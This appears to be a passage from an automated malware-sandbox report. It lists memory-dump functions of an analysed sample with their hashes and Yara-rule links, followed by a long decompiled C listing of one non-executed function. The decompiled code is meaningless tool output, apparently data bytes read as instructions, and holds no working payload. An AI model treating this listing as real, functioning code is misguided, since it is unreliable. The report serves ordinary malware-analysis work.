Instruction Fuzzy Hash: 47B01231107708A78D0133F3682D11C735E0A446053404452B81D46701DD3854508156

Uniqueness

Uniqueness Score: -1.00%

Function 00382F38, Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.704664028.0000000000380000.00000040.00000001.sdmp, Offset: 00380000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8ed00d5d774537e0b63583573e7837436a5a56fa78980a73114178cd1a9e51fa
Instruction ID: 7b52fac6a4619f8c8c24de8da7c48635b6baa1ecf62360ce61b592231d674934
Opcode Fuzzy Hash: 8ed00d5d774537e0b63583573e7837436a5a56fa78980a73114178cd1a9e51fa
Instruction Fuzzy Hash: 4EB0123030930A4A2A4027B23C48617339C560051538400E1950DC0410F550D4504140

Uniqueness

Uniqueness Score: -1.00%

Function 0038D7A0, Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.704664028.0000000000380000.00000040.00000001.sdmp, Offset: 00380000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a9e3380475cee2355462cb6b882d9f107000e4ec70b4912fc747fad656116791
Instruction ID: 9d9127883627826146735058c5c8f97730ff7c6c2a1bf088a5a44cb9ee5c91bd
Opcode Fuzzy Hash: a9e3380475cee2355462cb6b882d9f107000e4ec70b4912fc747fad656116791
Instruction Fuzzy Hash: F4B0923004A308EFE306BB51D80595AB76CBB022013E0005DF402218D96BA1A941E796

Uniqueness

Uniqueness Score: -1.00%

Function 00384502, Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.704664028.0000000000380000.00000040.00000001.sdmp, Offset: 00380000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0aff8446144e30abc533430f0b15789e3e1271023d0d19720819b31a8c91f09b
Instruction ID: be568b7038118f2bf9e15ae1c5112056c55ae1fec9e87e3386431d6329750949
Opcode Fuzzy Hash: 0aff8446144e30abc533430f0b15789e3e1271023d0d19720819b31a8c91f09b
Instruction Fuzzy Hash: 53B0122C90F342EB4302173428140282B58B306301320D093C80342E10F6A440417311

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0056410E, Relevance: .1, Instructions: 98
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E0056410E(void* __eax, signed char __ebx, signed char __ecx, signed char __edx, signed int __edi, signed int* __esi, void* __eflags) {
				void* _t579;
				intOrPtr* _t582;
				signed int _t583;
				signed char _t584;
				intOrPtr* _t585;
				intOrPtr* _t586;
				signed char _t587;
				signed char _t588;
				signed char _t589;
				signed char _t591;
				signed int* _t595;
				signed char _t596;
				intOrPtr* _t600;
				intOrPtr* _t601;
				signed char _t602;
				signed char _t603;
				intOrPtr* _t606;
				signed char _t607;
				signed char _t610;
				signed char _t612;
				signed char _t613;
				signed char _t614;
				signed char _t615;
				signed int _t616;
				signed char _t617;
				signed char _t618;
				intOrPtr* _t621;
				intOrPtr* _t622;
				signed char _t623;
				signed char _t624;
				signed char _t625;
				signed char _t626;
				signed int _t629;
				signed char _t631;
				signed char _t632;
				signed int _t633;
				intOrPtr* _t634;
				signed char _t635;
				signed char _t637;
				signed char _t638;
				signed char* _t639;
				intOrPtr* _t641;
				intOrPtr* _t642;
				signed char _t646;
				signed char _t647;
				signed char _t648;
				signed char _t650;
				signed char* _t651;
				signed char* _t652;
				signed char _t653;
				signed char _t656;
				signed char _t657;
				signed char _t659;
				signed int _t660;
				signed int _t661;
				signed char _t662;
				signed char _t663;
				signed char _t664;
				void* _t669;
				signed int _t670;
				signed int _t671;
				signed char _t672;
				intOrPtr* _t675;
				signed char _t676;
				signed char _t677;
				signed char _t1151;
				signed char _t1152;
				signed char _t1153;
				intOrPtr* _t1157;
				signed char _t1159;
				signed char _t1160;
				signed char _t1161;
				signed char _t1162;
				signed char _t1163;
				intOrPtr* _t1164;
				signed char _t1165;
				signed char _t1166;
				signed char _t1167;
				signed char _t1169;
				signed char _t1172;
				signed char _t1173;
				signed char _t1174;
				signed char _t1176;
				signed char _t1177;
				signed char _t1178;
				signed int* _t1179;
				intOrPtr* _t1181;
				signed char _t1182;
				signed int _t1183;
				signed int _t1184;
				signed char _t1185;
				signed char _t1242;
				signed char _t1243;
				signed char _t1244;
				signed char _t1248;
				signed char _t1249;
				signed char _t1250;
				signed char _t1252;
				signed char _t1253;
				signed char _t1254;
				signed char _t1255;
				signed char _t1256;
				signed char _t1257;
				signed char _t1258;
				signed char _t1259;
				signed char _t1260;
				signed char _t1298;
				signed char _t1299;
				signed char _t1302;
				signed char _t1304;
				signed char _t1305;
				intOrPtr* _t1306;
				signed char _t1307;
				signed char _t1308;
				signed char _t1310;
				signed char _t1311;
				signed char _t1313;
				signed int _t1339;
				signed int* _t1341;
				signed int* _t1343;
				signed int* _t1344;
				signed int* _t1359;
				intOrPtr* _t1360;
				intOrPtr* _t1361;
				signed int* _t1363;
				signed int* _t1364;
				void* _t1372;
				signed int _t1373;
				signed char _t1374;
				signed int _t1377;
				signed char _t1383;
				void* _t1390;

				_t1359 = __esi;
				_t1339 = __edi;
				_t1298 = __edx;
				_t1244 = __ecx;
				_t1169 = __ebx;
				_t579 = __eax;
				_push(es);
				if(__eflags >= 0) {
					L7:
					_push(es);
					return _t579;
				} else {
					 *__eax =  *__eax + __al;
					__eflags =  *__eax;
					 *__edx =  *__edx + __cl;
					asm("adc al, 0x6f");
					asm("cli");
					 *__eax =  *__eax + __al;
					__ch = __ch |  *__edx;
					 *__ebx =  *__ebx + __dl;
					_t7 = __eax + __eax;
					 *_t7 =  *(__eax + __eax) ^ __al;
					__eflags =  *_t7;
					__esp = __esp + 1;
					while(1) {
						 *__eax =  *__eax + __al;
						 *__ebx =  *__ebx + __cl;
						 *__eax =  *__eax + __al;
						asm("adc [edx], eax");
						_push(ds);
						__eax = __eax - 0x20062617;
						__eflags = __eax;
						if(__eflags >= 0) {
							break;
						}
						if(__eflags >= 0) {
							_t1373 = _t1372 - 1;
						} else {
							 *__edx =  *__edx - __ah;
							__eflags =  *__edx;
							 *_t582 =  *_t582 + _t582;
							_push(es);
							_push(ss);
							 *_t1339 =  *_t1339 - _t1244;
							 *_t1298 =  *_t1298 + _t1244;
							_push(ss);
							_t1298 = _t1298 ^  *_t1244;
							_t583 = _t582 -  *_t1169;
							_t1244 = _t1244 |  *_t1169;
							asm("out 0x28, eax");
							asm("aaa");
							 *_t583 =  *_t583 + _t583;
							_push(es);
							_t9 = _t1373 + 0x2b060000;
							 *_t9 =  *(_t1373 + 0x2b060000) - _t1169;
							__eflags =  *_t9;
							L14:
							 *_t1359 =  *_t1359 + _t583;
							_t1169 = _t1169 -  *_t1244;
							_push(es);
							 *_t1339 =  *_t1339 & _t583;
							__eflags =  *_t1339;
							if( *_t1339 >= 0) {
								 *_t583 =  *_t583 + _t583;
								_t1298 = _t1298 |  *(_t1339 + _t1373 * 2);
								asm("cli");
								 *_t583 =  *_t583 + _t583;
								_t1244 = _t1244 |  *_t1169;
								_pop(ss);
								if(_t1244 <= 0) {
									goto L14;
								} else {
									 *_t583 =  *_t583 + _t583;
									_t579 = _t583 + 0x14;
									 *_t1359 =  *_t1359 + 1;
									goto L7;
								}
							} else {
								 *_t1298 =  *_t1298 - _t583;
								 *_t583 =  *_t583 + _t583;
								_push(es);
								_push(ss);
								 *_t1339 =  *_t1339 - _t1244;
								 *_t1298 =  *_t1298 + _t1244;
								_push(ss);
								_t584 = _t583 ^  *0x3828;
								_push(es);
								_t1299 = _t1298 -  *_t1169;
								__eflags = _t1299;
								L16:
								_t11 = _t584 + _t584;
								 *_t11 =  *(_t584 + _t584) ^ _t584;
								__eflags =  *_t11;
								break;
							}
						}
						goto L371;
					}
					 *_t1339 =  *_t1339 + _t1299;
					 *_t584 =  *_t584 + _t584;
					 *0x28110000 =  *0x28110000 + _t1169;
					asm("sldt word [eax]");
					_push(es);
					_t585 = _t584 - _t584;
					 *_t585 =  *_t585 + _t585;
					_t586 = _t585 - 0xc6732620;
					 *_t586 =  *_t586 + _t586;
					_push(es);
					asm("adc eax, 0x7e261a2d");
					_t1359 = _t1359 - 1;
					 *_t586 =  *_t586 + _t586;
					_t587 = _t586 + 0x28;
					asm("sti");
					 *_t587 =  *_t587 + _t587;
					_t588 = _t587 |  *_t1359;
					asm("outsd");
					asm("cld");
					 *_t588 =  *_t588 + _t588;
					 *_t588 =  *_t588 + _t588;
					_push(es);
					_t1244 = (_t1244 |  *(_t1339 - 0x39)) -  *_t1299;
					_t1169 = (_t1169 |  *_t1299) - _t1359;
					_t584 = _t588 + 0x2b;
					asm("loopne 0x2");
					_t1299 = _t1299 - 1;
					__eflags = _t1299;
					asm("adc al, 0xfe");
					_push(es);
					asm("rol dword [eax], 0x0");
					_push(es);
					if(_t1299 >= 0) {
						goto L16;
					}
					 *_t584 =  *_t584 + _t584;
					_push(es);
					asm("outsd");
					 *_t1359 =  *_t1359 + _t584;
					_t589 = _t584 -  *_t584;
					__eflags = _t589;
					if(_t589 <= 0) {
						_t591 = _t1244;
						_t1247 = _t591;
						_push(ds);
						asm("bound esp, [eax+0x8]");
						asm("sbb [edx+0x58], esp");
						asm("adc eax, [0x2b0a4f2b]");
						asm("ror dword [ebx], cl");
						asm("loope 0x13");
						_t595 = (_t589 - 0x1602261d | 0x1604133f) + 0x152d5f17;
						 *_t595 =  *_t595 | _t1383;
						asm("std");
						_t1172 = _t1169 +  *_t591 + 1;
						_t596 = _t595 +  *_t595;
						__eflags = _t596;
						do {
							_pop(_t1302);
							_t1172 = _t1172 & _t596;
							asm("sahf");
							 *[es:eax+0xd] =  *[es:eax+0xd] + _t1172;
							 *_t1339 =  *_t1339 | _t1172;
							asm("adc [ecx+edx*8+0x13], ah");
							asm("adc eax, [esi]");
							asm("adc [esi+ebx], eax");
							asm("arpl cx, dx");
							asm("adc eax, [ebx+eax]");
							asm("adc [0x3071391], eax");
							asm("adc [0x61060711], eax");
							 *_t1247 =  *_t1247 | _t1172;
							asm("popad");
							asm("adc [esi], eax");
							asm("popad");
							asm("rcr byte [ecx+edx+0x5110c07], cl");
							_pop(ss);
							_pop(_t600);
							asm("adc eax, [0x32070511]");
							_t1247 = 3;
							_t601 = _t600 -  *_t600;
							asm("adc esi, [eax]");
							 *_t601 =  *_t601 + _t601;
							_push(es);
							 *_t601 =  *_t601 + _t601;
							 *_t1339 =  *_t1339 + _t1172;
							 *_t601 =  *_t601 + _t601;
							asm("adc [eax], ebp");
							asm("retf");
							 *_t601 =  *_t601 + _t601;
							_push(es);
							_t602 = _t601 -  *_t601;
							 *_t1172 =  *_t1172 + _t602;
							 *3 =  *3 ^ 0x00000003;
							 *3 =  *3 + _t1172;
							 *_t602 =  *_t602 + _t602;
							 *_t602 =  *_t602 + _t602;
							 *_t602 =  *_t602 + _t602;
							 *_t1302 =  *_t1302 + _t602;
							 *_t1172 =  *_t1172 - _t602;
							 *_t602 =  *_t602 + _t602;
							_t596 = _t602 |  *_t1302;
							__eflags = _t596;
						} while (_t596 >= 0);
						 *_t596 =  *_t596 + _t596;
						_t1173 = _t1172 |  *_t1302;
						_t603 = _t596 - 0x2a262603;
						__eflags = _t603;
						if(_t603 < 0) {
							 *_t603 =  *_t603 + _t603;
							_t1161 = _t603 + 0x2b;
							asm("clc");
							 *_t1161 =  *_t1161 + _t1161;
							 *_t1173 =  *_t1173 + _t1302;
							 *_t1173 =  *_t1173 ^ _t1161;
							 *_t1173 =  *_t1173 + _t1173;
							 *_t1161 =  *_t1161 + _t1161;
							 *_t1161 =  *_t1161 + _t1161;
							 *3 =  *3 + _t1302;
							_t1242 = _t1173 +  *((intOrPtr*)(_t1173 + 0x52));
							 *_t1161 =  *_t1161 + _t1161;
							_t1162 = _t1161 + 0x6f;
							asm("std");
							 *_t1162 =  *_t1162 + _t1162;
							_t1163 = _t1162 |  *_t1242;
							__eflags = _t1163;
							do {
							} while (__eflags >= 0);
							 *_t1163 =  *_t1163 + _t1163;
							_t1243 = _t1242 |  *_t1302;
							_t1164 = _t1163 - 0x142b2603;
							_t1247 = 0x00000003 |  *_t1243;
							asm("sti");
							_t1173 = _t1243 +  *((intOrPtr*)(_t1243 + 0x52));
							 *_t1164 =  *_t1164 + _t1164;
							_t1165 = _t1164 + 6;
							asm("outsd");
							 *_t1165 =  *_t1165 + 1;
							 *_t1302 =  *_t1302 + _t1247;
							asm("outsd");
							_t1166 = _t1165;
							 *_t1166 =  *_t1166 + _t1166;
							_t1167 = _t1166 |  *_t1359;
							asm("outsd");
							 *_t1247 =  *_t1247 + _t1167;
							 *_t1302 =  *_t1302 + _t1247;
							asm("adc eax, 0x6f06e633");
							 *_t1247 =  *_t1247 + _t1167;
							 *_t1302 =  *_t1302 + _t1247;
							_t603 = _t1167 -  *_t1167;
							asm("sbb esi, [eax]");
						}
						_pop(es);
						 *((intOrPtr*)(_t1339 + 0x41000001)) =  *((intOrPtr*)(_t1339 + 0x41000001)) + _t1173;
						 *_t603 =  *_t603 + _t603;
						__eflags =  *_t603;
						asm("adc [ebx], eax");
						_push(ss);
						if( *_t603 < 0) {
							 *_t603 =  *_t603 + _t603;
							__eflags =  *_t603;
						}
						_t1174 = _t1173 |  *_t603;
						 *_t1302 =  *_t1302 + _t1247;
						_t606 = _t603 - 0x6f09260b +  *_t1247 - 0xd032b08;
						_t1360 = _t1359 - _t1174;
						_t1374 = _t1373 +  *_t1174;
						_push(es);
						 *(_t1339 + 4) =  *(_t1339 + 4) | _t1374;
						 *_t606 =  *_t606 + _t606;
						_t607 = _t606 - 0x17082626;
						_t1176 = _t1339;
						 *_t607 =  *_t607 + _t607;
						__eflags =  *_t607;
						do {
							 *((intOrPtr*)(_t1374 + 0xb11261e)) =  *((intOrPtr*)(_t1374 + 0xb11261e)) + _t1176;
							ds = ss;
							asm("popfd");
							asm("adc [ebx], ecx");
							_pop(ss);
							asm("outsd");
							_t1176 = 0x17;
							_t1302 = _t1302 ^  *_t1339;
							_t1247 = _t1247 -  *_t1302;
							_t607 = _t607 + 0x1b0a0001 - 0x8e072610 | 0x0000002b;
							asm("fcom dword [ebx]");
							asm("fisttp word [ebx]");
							_t1374 = (_t1374 |  *0x17) - _t1360;
							__eflags = _t1374;
							if(__eflags > 0) {
								 *_t607 =  *_t607 + _t607;
								_t1247 = _t1247 |  *_t1302;
								asm("fnstsw word [esi]");
								 *_t607 =  *_t607 + _t607;
								 *_t1360 =  *_t1360 + _t1302;
								_pop(es);
								asm("invalid");
								__eflags = _t1302 - _t607;
								 *_t607 =  *_t607 + _t607;
								 *_t607 =  *_t607 + _t607;
								 *0x28a0793f = _t607;
								_t1160 = _t607 &  *_t607;
								 *_t1360 =  *_t1360 + _t1160;
								_pop(es);
								asm("adc [esi], eax");
								_pop(es);
								asm("invalid");
								_push(es);
								 *_t1160 =  *_t1160 + _t1160;
								_t1302 = _t1302 |  *0x17;
								_t607 = _t1160 + 0x20;
								__eflags = _t607;
							}
							asm("stosb");
							asm("aas");
						} while (__eflags >= 0);
						 *_t1302 =  *_t1302 - _t607;
						 *_t607 =  *_t607 + _t607;
						0x28a0793f[_t1302] = 0x28a0793f[_t1302] & _t607;
						_t610 = _t607 &  *_t607;
						 *_t1360 =  *_t1360 + _t610;
						es = es;
						asm("adc [esi], eax");
						_pop(ss);
						asm("salc");
						_pop(es);
						asm("invalid");
						asm("fisubr dword [eax]");
						_push(es);
						 *_t610 =  *_t610 + _t610;
						_t1248 = _t1247 |  *_t610;
						 *_t1302 =  *_t1302 + _t1248;
						asm("adc eax, [edi]");
						0x28a0793f[_t1374] = 0x28a0793f[_t1374] & _t1302;
						_t612 = (_t610 ^ 0x00000000) &  *(_t610 ^ 0x00000000);
						 *_t1360 =  *_t1360 + _t612;
						asm("adc [eax+ebp], eax");
						_t613 = _t612 ^ 0x00000000;
						 *_t1302 =  *_t1302 + _t1248;
						asm("adc eax, [0x527b02]");
						 *((intOrPtr*)(_t1248 + _t1302)) =  *((intOrPtr*)(_t1248 + _t1302)) + _t613;
						_t614 = _t613 + 0xe76f;
						__eflags = _t614;
						while(1) {
							asm("outsd");
							asm("out 0x0, eax");
							 *_t1302 =  *_t1302 + _t1248;
							_t615 = _t614 - 0x1e;
							0x28a0793f[_t1302] = 0x28a0793f[_t1302] & _t615;
							_t616 = _t615 &  *_t615;
							 *_t1360 =  *_t1360 + _t616;
							_pop(es);
							asm("adc [esi], eax");
							_pop(es);
							asm("invalid");
							_push(es);
							 *_t616 =  *_t616 + _t616;
							_t1249 = _t1248 |  *_t1302;
							asm("invalid");
							 *_t616 =  *_t616 + _t616;
							 *_t1302 =  *_t1302 + _t616;
							__eflags =  *_t1302;
							if( *_t1302 != 0) {
								break;
							}
							 *_t616 =  *_t616 + _t616;
							asm("out 0x0, eax");
							 *_t1302 =  *_t1302 + _t1249;
							_t1157 = _t616 + 0x80 - 0x527b020f;
							 *_t1157 =  *_t1157 + _t1157;
							_pop(es);
							asm("outsd");
							asm("out 0x0, eax");
							 *_t1302 =  *_t1302 + _t1249;
							_t1159 = _t1157 + 0x11 - 0x37;
							asm("adc [esi], eax");
							_t1302 = _t1302 ^  *_t1176;
							0x28a0793f[_t1302] = 0x28a0793f[_t1302] & _t1159;
							_t614 = _t1159 &  *_t1159;
							 *_t1360 =  *_t1360 + _t614;
							es = ss;
							 *_t1339 =  *_t1339 - _t614;
							 *_t614 =  *_t614 + _t614;
							_t1248 = _t1249 |  *_t1302;
							__eflags = _t1248;
							asm("fidiv word [eax-0x5e]");
							asm("aas");
							if(_t1248 >= 0) {
								continue;
							} else {
								 *_t1302 =  *_t1302 - _t614;
								 *_t614 =  *_t614 + _t614;
								es = es;
								asm("adc [esi], eax");
								_pop(ss);
								asm("fiadd dword [edi]");
								asm("invalid");
								asm("salc");
								 *_t1360 =  *_t1360 - _t614;
								 *_t614 =  *_t614 + _t614;
								_t1249 = _t1248 |  *_t1302;
								asm("ficom word [ebp+0x11]");
							}
							break;
						}
						asm("adc [esi], eax");
						_pop(ss);
						asm("salc");
						asm("adc eax, [esi]");
						asm("adc [esi], eax");
						asm("adc [edx], ecx");
						asm("adc eax, 0xdeffffff");
						_t617 = _t616 & 0x00004d28;
						 *_t617 =  *_t617 | _t617;
						_t618 = _t617 &  *_t617;
						 *_t1360 =  *_t1360 + _t618;
						_t1377 =  &(0x28a0793f[ *_t618]);
						asm("cmpsd");
						 *_t618 =  *_t618 + _t618;
						_t1304 = _t1302 |  *_t1176 |  *_t1176;
						 *(_t1360 + 0x47) =  *(_t1360 + 0x47) | _t1339;
						 *_t618 =  *_t618 + _t618;
						 *_t1249 =  *_t1249 | _t1304;
						 *(_t1176 + 8) =  *(_t1176 + 8) | _t1304;
						 *((intOrPtr*)(_t618 + 0x11)) =  *((intOrPtr*)(_t618 + 0x11)) + _t618 + 0x11;
						asm("bound edi, [ecx+edi*2]");
						_t621 =  *0x2228;
						_push(es);
						asm("outsd");
						 *_t621 =  *_t621 + 0x4e280a00;
						 *_t621 =  *_t621 + _t621;
						_t1177 = _t1176 | _t1304;
						 *((intOrPtr*)(_t1360 + 0x31)) =  *((intOrPtr*)(_t1360 + 0x31)) + _t1177;
						 *_t621 =  *_t621 + _t621;
						_t1250 = _t1249 |  *_t1304;
						_t622 = _t621 -  *_t1250;
						asm("sbb al, 0x0");
						 *_t622 =  *_t622 + _t622;
						 *_t622 =  *_t622 + _t622;
						 *_t622 =  *_t622 + _t622;
						 *_t622 =  *_t622 + _t622;
						 *((intOrPtr*)(_t1250 + 2)) =  *((intOrPtr*)(_t1250 + 2)) + _t1177;
						 *_t622 =  *_t622 + _t622;
						_t1252 = es;
						 *_t622 =  *_t622 + _t622;
						 *_t1360 =  *_t1360 + _t1177;
						 *_t622 =  *_t622 + _t622;
						 *_t1304 =  *_t1304 + _t1177;
						 *_t622 =  *_t622 + _t622;
						 *_t1177 =  *_t1177 + _t622;
						 *_t1252 =  *_t1252 ^ _t1252;
						 *_t1177 =  *_t1177 + _t1177;
						 *_t622 =  *_t622 + _t622;
						 *_t622 =  *_t622 + _t622;
						 *_t622 =  *_t622 + _t622;
						 *((intOrPtr*)(_t1177 - 0x36)) =  *((intOrPtr*)(_t1177 - 0x36)) + _t1304;
						 *_t622 =  *_t622 + _t622;
						_push(es);
						 *_t1252 =  *_t1252 - _t1252;
						 *_t622 =  *_t622 + _t622;
						_t1305 = _t1304 | 0x28a0793f[_t1360];
						 *_t1305 =  *_t1305 + _t622;
						asm("adc eax, 0x2a26022d");
						 *0x28a0793f =  *0x28a0793f;
						_t623 = _t622 + 0x2b;
						asm("clc");
						 *_t1177 =  *_t1177 + _t623;
						 *_t1305 =  *_t1305 ^ _t1252;
						 *_t1339 =  *_t1339 + _t1252;
						 *_t623 =  *_t623 + _t623;
						 *_t623 =  *_t623 + _t623;
						 *_t623 =  *_t623 + _t623;
						 *_t1305 =  *_t1305 + _t623;
						asm("sbb [ebp+0xa282607], ebx");
						 *_t623 =  *_t623 + _t623;
						_t1253 = _t1252 |  *_t1305;
						_t1361 = _t1360 - _t1339;
						 *_t1177 =  *_t1177 + _t1305;
						 *_t1253 =  *_t1253 ^ _t623;
						 *_t1361 =  *_t1361 + _t623;
						 *_t623 =  *_t623 + _t623;
						 *_t1339 =  *_t1339 + _t1177;
						 *_t623 =  *_t623 + _t623;
						asm("adc [esi+0x6d], edi");
						 *_t623 =  *_t623 + _t623;
						_t624 = _t623 + 0x2a;
						 *_t624 =  *_t624 + _t624;
						_t625 = _t624 |  *_t624;
						asm("sldt word [eax]");
						 *_t625 =  *_t625 + _t625;
						 *_t625 =  *_t625 + _t625;
						 *_t1305 =  *_t1305 + _t625;
						_push(ss);
						asm("sbb [0x23282607], ebp");
						 *_t625 =  *_t625 + _t625;
						_t1254 = _t1253 |  *_t1305;
						_t1363 = _t1361 +  *_t624 - _t1339;
						 *((intOrPtr*)(_t1254 - 0x7b)) =  *((intOrPtr*)(_t1254 - 0x7b)) + _t1177;
						 *_t625 =  *_t625 + _t625;
						asm("into");
						asm("retf 0xbeef");
						 *_t625 =  *_t625 + _t625;
						 *_t625 =  *_t625 + _t625;
						_t626 = _t1254;
						_t1255 = _t625;
						 *_t626 =  *_t626 + _t626;
						_t48 = _t1177 + 0x79 + _t1305 * 2;
						 *_t48 =  *(_t1177 + 0x79 + _t1305 * 2) + _t1255;
						__eflags =  *_t48;
						if(__eflags >= 0) {
							if(__eflags != 0) {
								goto L71;
							} else {
								goto L54;
							}
						} else {
							asm("gs insd");
							_push(_t1305);
							if(__eflags >= 0) {
								L54:
								asm("arpl [ebp+0x73], sp");
								_push(_t1305);
								goto L55;
							} else {
								if(__eflags != 0) {
									L55:
									if(__eflags != 0) {
										goto L72;
									} else {
										if(__eflags == 0) {
											goto L71;
										} else {
											asm("insd");
											goto L58;
										}
									}
								} else {
									asm("arpl [ebp+0x73], sp");
									_push(_t1305);
									if(__eflags >= 0) {
										L58:
										_push(_t1305);
										if(__eflags >= 0) {
											goto L73;
										} else {
											goto L59;
										}
									} else {
										if(__eflags != 0) {
											L59:
											if(__eflags == 0) {
												asm("arpl [ebp+0x53], sp");
												if(__eflags != 0) {
													 *_t626 =  *_t626 + _t626;
													__eflags =  *_t626;
												}
												 *_t1305 =  *_t1305 + _t626;
												 *_t626 =  *_t626 + _t626;
												 *_t626 =  *_t626 + _t626;
												__eflags =  *_t626;
												goto L63;
											}
										} else {
											asm("arpl [ebp+0x52], sp");
											asm("popad");
											if(__eflags < 0) {
												L48:
												 *(_t626 + 0x75) =  *(_t626 + 0x75) & _t1305;
												asm("bound ebp, [ecx+ebp*2+0x63]");
											} else {
												 *0x28A079B2 =  *0x28A079B2 & _t1255;
												asm("arpl [edi+0x72], bp");
												asm("insb");
												_t1383 =  *(_t1305 + 0x2c) * 0x72655620;
												__eflags = _t1383;
												if(_t1383 >= 0) {
													L63:
													 *_t626 =  *_t626 + _t626;
													 *((intOrPtr*)(_t626 + 0x41)) =  *((intOrPtr*)(_t626 + 0x41)) + _t1305;
													_push(_t626);
													__eflags = _t1255 + 1;
													_t1390 = _t1383 + 2;
													_push(_t626);
													_t1255 = 0x1f0b87ff;
													goto L64;
												} else {
													asm("outsd");
													asm("outsb");
													__eflags = _t626 - 0x2e302e32;
													 *_t1363 =  *_t1363 ^ _t1255;
													 *_t626 =  *_t626 ^ _t1255;
													_t1177 = _t1177 + 1;
													__eflags = _t1177;
													if(__eflags != 0) {
														L65:
														_t1153 = _t626;
														 *_t1153 =  *_t1153 + _t1153;
														__eflags =  *_t1153;
														_t626 = _t1153 + _t1177;
														 *_t626 =  *_t626 + _t626;
														__eflags =  *_t626;
														goto L67;
													} else {
														if(__eflags == 0) {
															L67:
															 *_t626 =  *_t626 + _t1255;
															_t1383 = _t1390 - 1;
															 *_t1305 =  *_t1305 + _t1177;
															asm("insd");
															 *_t1255 =  *_t1255 + _t626;
															 *_t626 =  *_t626 + _t626;
															 *_t626 =  *_t626 + _t626;
															_push(es);
															_push(_t1383);
															 *((intOrPtr*)(_t626 + _t626 + 0x44)) =  *((intOrPtr*)(_t626 + _t626 + 0x44)) + _t1255;
															 *0x20000030 =  *0x20000030 + _t626;
															 *_t626 =  *_t626 + _t1305;
															 *_t626 =  *_t626 + _t626;
															_t1377 = _t1377 - 1;
															__eflags = _t1377;
															 *_t1177 =  *_t1177 + _t626;
															 *_t626 =  *_t626 + _t626;
															 *((intOrPtr*)(_t626 + _t626)) =  *((intOrPtr*)(_t626 + _t626)) + _t626;
															 *_t626 =  *_t626 + _t626;
															asm("invalid");
															 *_t626 =  *_t626 + _t626;
															__eflags =  *_t626;
															 *_t626 =  *_t626 + _t1177;
															__eflags =  *_t626;
															 *_t626 =  *_t626 + _t626;
															 *_t626 =  *_t626 + _t626;
															 *_t626 =  *_t626 + _t626;
															__eflags =  *_t626;
															L71:
															_t626 = _t626 + 1;
															 *_t626 =  *_t626 + _t626;
															__eflags =  *_t626;
															L72:
															 *_t626 =  *_t626 + _t626;
															 *_t626 =  *_t626 + _t626;
															 *_t626 =  *_t626 + _t626;
															 *_t626 =  *_t626 + _t626;
															 *_t626 =  *_t626 + _t626;
															__eflags =  *_t626;
															L73:
															 *_t626 =  *_t626 + _t626;
															 *_t626 =  *_t626 + _t626;
															 *_t626 =  *_t626 + _t626;
															__eflags =  *_t626;
														} else {
															if(__eflags < 0) {
																L64:
																asm("sbb [esp+edi*2+0xd], eax");
																goto L65;
															} else {
																__eflags = _t626 - 0x7475656e;
																if(_t626 < 0x7475656e) {
																	goto L65;
																} else {
																	asm("insb");
																	_t626 = _t626 - 0x20;
																	__eflags = _t626;
																	goto L48;
																}
															}
														}
													}
												}
											}
										}
									}
								}
							}
						}
						 *_t626 =  *_t626 + _t626;
						 *_t626 =  *_t626 + _t626;
						 *_t626 =  *_t626 + _t626;
						 *_t626 =  *_t626 + _t626;
						 *_t626 =  *_t626 + _t626;
						 *_t626 =  *_t626 + _t626;
						 *_t626 =  *_t626 + _t626;
						 *_t626 =  *_t626 + _t626;
						 *_t626 =  *_t626 + _t626;
						_t69 = _t626 + 0xe000000;
						 *_t69 =  *(_t626 + 0xe000000) + _t626;
						__eflags =  *_t69;
						_pop(ds);
						_t1306 = 0x9b4000e;
						asm("int 0x21");
						_t627 = 0x21cd4c01;
						_push(_t1383);
						_push(0x70207369);
						if( *_t69 < 0) {
							L79:
							 *_t627 =  &(_t627[ *_t627]);
							_t627[_t627] =  &(_t627[_t627[_t627]]);
							 *_t627 =  &(_t627[ *_t627]);
							 *_t627 =  &(_t627[ *_t627]);
							 *_t627 =  &(_t627[ *_t627]);
							_t627[0x2000000] =  &(_t627[_t627[0x2000000]]);
							 *_t627 =  &(_t627[ *_t627]);
							 *_t627 =  &(_t627[ *_t627]);
							 *_t627 =  &(_t627[ *_t627]);
							__eflags =  *_t627;
						} else {
							asm("a16 jb 0x64");
							asm("insd");
							_t71 = _t1177 + 0x61;
							 *_t71 =  *(_t1177 + 0x61) & 0x21cd4c01;
							__eflags =  *_t71;
							asm("outsb");
							asm("outsb");
							asm("outsd");
							if(__eflags == 0) {
								L78:
								 *_t627 =  &(_t627[ *_t627]);
								_t1383 = _t1383 - 1;
								 *_t1177 =  &(_t627[ *_t1177]);
								 *_t1363 =  &(_t627[ *_t1363]);
								asm("movsb");
								_t1377 = _t1377 - 1;
								 *_t627 =  &(_t627[ *_t627]);
								 *_t627 =  &(_t627[ *_t627]);
								 *_t627 =  &(_t627[ *_t627]);
								 *_t627 =  &(_t627[ *_t627]);
								asm("loopne 0x2");
								_t1151 =  &(_t627[ *_t1255]) |  *_t1255;
								 *_t1151 =  *_t1151 | _t1151;
								 *_t1151 =  *_t1151 + _t1255;
								 *_t1151 =  *_t1151 + _t1151;
								 *_t1363 =  *_t1363 + _t1151;
								 *_t1151 =  *_t1151 + _t1151;
								 *_t1151 =  *_t1151 + _t1151;
								 *_t1151 =  *_t1151 + _t1151;
								es =  *_t1363;
								 *_t1151 =  *_t1151 + _t1151;
								 *_t1151 =  *_t1151 & _t1151;
								 *_t1151 =  *_t1151 + _t1151;
								asm("pushad");
								 *_t1151 =  *_t1151 + _t1151;
								 *_t1151 =  *_t1151 + _t1151;
								_t1152 = _t1151 + 1;
								 *_t1152 =  *_t1152 + _t1152;
								 *_t1152 =  *_t1152 & _t1152;
								 *_t1152 =  *_t1152 + _t1152;
								_t627 = _t1152 +  *_t1152;
								_t627[_t627] =  &(_t627[_t627[_t627]]);
								 *_t627 =  &(_t627[ *_t627]);
								 *_t627 =  &(_t627[ *_t627]);
								__eflags =  *_t627;
								goto L79;
							} else {
								asm("bound esp, [ebp+0x20]");
								if(__eflags >= 0) {
									asm("outsb");
